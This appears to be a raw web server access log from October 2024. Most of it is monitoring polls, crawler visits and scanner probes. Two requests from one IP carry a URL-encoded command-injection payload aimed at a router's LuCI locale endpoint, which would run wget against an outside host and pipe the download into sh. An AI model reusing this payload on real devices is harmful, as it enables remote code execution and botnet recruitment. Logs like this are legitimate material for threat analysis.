212.91.246.72 - - [03/Oct/2024:07:24:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:25:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:26:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:26:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.84.89.2 - - [03/Oct/2024:07:27:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
212.91.246.72 - - [03/Oct/2024:07:27:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:07:28:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:07:28:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:29:15 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:07:29:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:07:29:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:07:30:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [03/Oct/2024:07:30:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
149.50.103.48 - - [03/Oct/2024:07:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:07:31:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.8 - - [03/Oct/2024:07:32:14 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Oct/2024:07:32:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:32:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:07:33:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:07:34:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:07:34:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.175.120.105 - - [03/Oct/2024:07:35:05 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.224.128.67 - - [03/Oct/2024:07:35:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
60.108.124.230 - - [03/Oct/2024:07:35:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
